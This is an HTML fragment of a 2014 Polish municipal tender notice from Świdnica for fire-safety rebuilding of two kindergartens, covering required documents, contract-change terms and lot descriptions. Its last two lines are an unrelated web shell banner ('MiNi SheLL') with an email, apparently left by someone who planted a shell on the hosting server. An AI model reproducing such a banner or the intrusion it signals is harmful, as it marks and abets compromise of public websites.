<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.19.	Dodatkowo Wykonawca winien do oferty dołączyć:
7.19.1.	Formularz ofertowy stanowiący (wzór zał. nr 1.1-.1.2),
7.19.2.	Oświadczenia i dokumenty, o których mowa w rozdz. 7 SWIZ,
7.19.3.	Pełnomocnictwo, o którym mowa w rozdz. 6 pkt 6.4 SIWZ,
7.19.4.	Dowód wniesienia wadium,
7.19.5.	Parafowany wzór umowy o roboty budowlane (wzór zał. nr 8.1-8.2)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>18.1.	Umowa zostanie zawarta na warunkach określonych we wzorze umowy, który stanowi załącznik nr 8.1 i 8.2 do SIWZ.
18.2.	Zakres świadczenia Wykonawcy wynikający z umowy będzie tożsamy z jego zobowiązaniem zawartym w ofercie złożonej w niniejszym postępowaniu o udzielenie zamówienia.
18.3.	Zamawiający dopuszcza zmiany umowy w formie pisemnej, aneksem zaakceptowanym przez obie strony umowy, pod rygorem nieważności w następujących przypadkach:
18.3.1.	Zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna) np. z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez strony umowy, jeżeli te zmiany są korzystne dla Zamawiającego.
18.3.2.	Wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia, np. jeżeli nastąpi zmiana stawki podatku od towarów i usług (VAT),
18.3.3.	Zmiana sposobu świadczeń związana z:
a) aktualizacją lub zmianą dokumentacji projektowej (konieczność opracowania projektu zamiennego i zmiany pozwolenia na budowę),
b) odmiennymi od przyjętych w dokumentacji rozwiązań technicznych lub/i materiałowych w przypadku:
-gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
-zmiany obowiązującego prawa,
-niedostępności na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej spowodowane zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
18.3.4.	Zmiana terminu wykonania zamówienia w przypadku:
a) wystąpienia kolizji z niezinwentaryzowanymi podziemnymi urządzeniami, instalacją lub obiektami infrastrukturalnymi,
b) wystąpienia szczególnie niekorzystnych warunków atmosferycznych w szczególności: 
-obfitych i długotrwałych opadów atmosferycznych, w szczególności śniegu i deszczu,
-niskich temperatur uniemożliwiających realizację umowy, 
-klęsk żywiołowych występujących na terenie objętym realizacją umowy.
c) spowodowane wstrzymaniem robót przez Zamawiającego,
d) spowodowane koniecznością wprowadzenia zmian w dokumentacji projektowej,
e) spowodowane innymi przyczynami zewnętrznymi niezależnymi od Zamawiającego i Wykonawcy skutkuje niemożliwością uzyskania stosowanych decyzji, zezwoleń i uzgodnień. 
18.3.5.	Zmiany osobowe, przy pomocy, których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w rozdz. 6 pkt 6.1 ppkt 6.1.3 SIWZ w przypadku: 
a) śmierci, choroby lub innych zdarzeń losowych tych osób,
b) nie wywiązywania się osób z obowiązków wynikających z umowy,
c) rezygnacji tych osób z wykonywania swoich obowiązków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.swidnica.bip-gov.info.pl/bip/glowna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2014 godzina 09:00, miejsce: Urząd Miejski w Świdnicy ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Przebudowa budynku Przedszkola Miejskiego nr 15 w Świdnicy w zakresie dostosowania do wymogów bezpieczeństwa pożarowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.2.1.	Zadanie 1: celem zadania jest dostosowanie budynku Przedszkola Miejskiego nr 15 do wymogów bezpieczeństwa pożarowego poprzez wymianę drzwi na p.poż, wymianę okna na zintegrowane z systemem oddymiania, rozbiórkę naświetla wraz z wykonaniem ścianki pełnej z cegły obustronnie otynkowanej, obudowę głównej klatki schodowej ścianą z płyt G-K oraz przeszkleniami z profili aluminiowych, rozbiórkę wykładziny oraz drewnianego parkietu z ułożeniem płytek gres, ułożenie wykładziny PCV trudnopalnej na głównej klatce schodowej, demontaż boazerii z wykonaniem tynków cem-wap, malowanie ścian, wykonanie instalacji hydrantowej wraz hydrantami, montaż zestawu wodomierzowego, zaworu antyskażeniowego, wykonanie oświetlenia ewakuacyjnego, montaż czujek dymu, montaż centralki oddymiania. Przedmiot zamówienia obejmuje również wymianę przyłącza wodociągowego. UWAGA: Zamówienie nie obejmuje montażu pożarowego wyłącznika prądu. 
Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej tj. projekcie budowlanym, wykonawczym, szczegółowej specyfikacji technicznej wykonania i odbioru robót, projekcie wymiany przyłącza wodociągowego oraz ekspertyzie technicznej rzeczoznawcy budowlanego i rzeczoznawcy ds. zabezpieczeń przeciwpożarowych autorstwa Spółki Inwestycyjno - Budowlanej Biodom sp. z o.o. z siedzibą w Dzierżoniowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Przebudowa budynku Miejskiego Przedszkola Integracyjnego nr 16 w Świdnicy w zakresie dostosowania do wymogów bezpieczeństwa pożarowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.2.2.	Zadanie 2: celem zadania jest dostosowanie budynku Miejskiego Przedszkola Integracyjnego nr 16 do wymogów bezpieczeństwa pożarowego poprzez wymianę drzwi na p.poż, wymianę okna na zintegrowane z systemem oddymiania, rozbiórkę naświetla wraz z wykonaniem ścianki pełnej z cegły obustronnie otynkowanej, obudowę głównej klatki schodowej ścianą z płyt G-K oraz przeszkleniami z profili aluminiowych, obudowa ścianką murowaną z cegły pełnej wejścia do piwnicy od strony bocznej klatki schodowej, ułożenie wykładziny PCV trudnopalnej na głównej klatce schodowej, demontaż boazerii z wykonaniem tynków cem-wap, malowanie ścian, wykonanie instalacji hydrantowej wraz hydrantami, montaż zestawu wodomierzowego, zaworu antyskażeniowego, wykonanie oświetlenia ewakuacyjnego, montaż czujek dymu, montaż centralki oddymiania, montaż pożarowego wyłącznika prądu. Ponadto przedmiot zamówienia obejmuje wymianę odcinka przyłącza wodociągowego. 
Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej tj. projekcie budowlanym, wykonawczym, szczegółowej specyfikacji technicznej wykonania i odbioru robót, projekcie wymiany odcinka przyłącza oraz ekspertyzie technicznej rzeczoznawcy budowlanego i rzeczoznawcy ds. zabezpieczeń przeciwpożarowych autorstwa Spółki Inwestycyjno - Budowlanej Biodom sp. z o.o. z siedzibą w Dzierżoniowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com